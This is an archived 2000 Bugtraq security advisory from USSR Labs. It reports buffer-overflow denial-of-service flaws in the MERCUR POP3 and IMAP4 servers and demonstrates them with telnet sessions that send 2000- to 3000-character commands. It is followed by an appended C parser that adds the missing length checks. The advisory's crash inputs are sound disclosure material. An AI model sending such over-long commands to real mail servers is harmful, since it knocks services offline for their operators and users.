[14285] in bugtraq


Local / Remote Multiples Remote DoS Attacks in MERCUR v3.2* for

daemon@ATHENA.MIT.EDU (Ussr Labs)
Tue Mar 14 23:27:11 2000

Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Message-Id:  <NCBBKFKDOLAGKIAPMILPKEPNCCAA.labs@ussrback.com>
Date:         Tue, 14 Mar 2000 04:12:24 -0300
Reply-To: Ussr Labs <labs@USSRBACK.COM>
From: Ussr Labs <labs@USSRBACK.COM>
X-To:         BUGTRAQ <bugtraq@securityfocus.com>
To: BUGTRAQ@SECURITYFOCUS.COM

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Local / Remote Multiples Remote DoS Attacks in MERCUR v3.2* for
Windows 98/NT Vulnerability

USSR Advisory Code:   USSR-2000035

Release Date:
March 15, 2000

Systems Affected:
MERCUR Mailserver 3.2
MERCUR POP3-Server (v3.20.01) for Windows 98/NT
MERCUR IMAP4-Server (v3.20.01) for Windows 98/NT

THE PROBLEM

UssrLabs found multiple places in MERCUR v3.20.* where the software
does not perform proper bounds checking.
The following all result in a Denial of Service against the service
in question.


Example:
[hellme@die-communitech.net$ telnet example.com 110
Trying example.com...
Connected to example.com.
Escape character is '^]'.
+OK MERCUR POP3-Server (v3.20.01 Unregistered) for Windows NT ready at Tue, 14 Mar 2000  03:30:39 -0300
user (buffer)

Where [buffer] is approx. 2000 characters.

[hellme@die-communitech.net$ telnet example.com 143
Trying example.com...
Connected to example.com.
Escape character is '^]'.
* OK MERCUR IMAP4-Server (v3.20.01 Unregistered) for Windows NT ready at Tue, 14 Mar 2000  03:34:09 -0300
(buffer)

Where [buffer] is approx. 3000 characters.

Binary or source for this Exploit:

http://www.ussrback.com/

Exploit:
The exploit crashes the POP3 and IMAP services on the remote machine.


Vendor Status:
informed

Vendor   Url: http://www.atrium-software.com
Program Url: http://www.atrium-software.com/mercur/mercur_e.html

Credit: USSRLABS

SOLUTION
Nothing yet.

Greetings:
Eeye, Attrition, w00w00, beavuh, Rhino9, ADM, HNN, Technotronic and
Wiretrip.

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.2 for non-commercial use <http://www.pgp.com>

iQA/AwUBOM3mWKVRYEYcg938EQIXsQCgmHUTL47TZHT77Z2jBi6G4kEQx/8AoPV3
p8SaqmGK9Dls6ujMJucLz4vq
=CUnk
-----END PGP SIGNATURE-----
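
Added example (not part of the original advisory and not MERCUR code): a POP3 command-line parser in C that applies the bounds checks the advisory says are missing, rejecting an over-long "user" line before any byte is copied into a fixed buffer. The limits POP3_MAX_LINE and POP3_MAX_ARG and all names are assumptions chosen for this example; the advisory specifies none.

```c
#include <stddef.h>
#include <string.h>
#include <ctype.h>

#define POP3_MAX_LINE 255  /* assumed cap on one command line, CRLF included */
#define POP3_MAX_ARG   40  /* assumed cap on a single argument */

enum pop3_status { POP3_OK = 0, POP3_ERR_TOO_LONG, POP3_ERR_SYNTAX };

struct pop3_cmd {
    char keyword[5];                /* 3-4 letters plus NUL */
    char arg[POP3_MAX_ARG + 1];     /* argument plus NUL */
};

/* Parse one received line of `len` bytes (not NUL-terminated).
 * Every length is validated before anything is written to `out`. */
enum pop3_status pop3_parse_line(const char *line, size_t len,
                                 struct pop3_cmd *out)
{
    size_t klen, alen, i;

    if (len > POP3_MAX_LINE)
        return POP3_ERR_TOO_LONG;   /* reject before touching any buffer */
    while (len > 0 && (line[len - 1] == '\r' || line[len - 1] == '\n'))
        len--;                      /* strip the line terminator */

    for (klen = 0; klen < len && line[klen] != ' '; klen++)
        ;                           /* keyword ends at first space */
    if (klen < 3 || klen > 4)
        return POP3_ERR_SYNTAX;
    for (i = 0; i < klen; i++)
        if (!isalpha((unsigned char)line[i]))
            return POP3_ERR_SYNTAX;

    alen = (klen < len) ? len - klen - 1 : 0;  /* bytes after the space */
    if (alen > POP3_MAX_ARG)
        return POP3_ERR_TOO_LONG;   /* argument would not fit in out->arg */

    for (i = 0; i < klen; i++)
        out->keyword[i] = (char)toupper((unsigned char)line[i]);
    out->keyword[klen] = '\0';
    if (alen > 0)
        memcpy(out->arg, line + klen + 1, alen);
    out->arg[alen] = '\0';
    return POP3_OK;
}
```

The network reader feeding this function needs the same discipline: stop accumulating and answer with an error once more than POP3_MAX_LINE bytes arrive without a line terminator.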
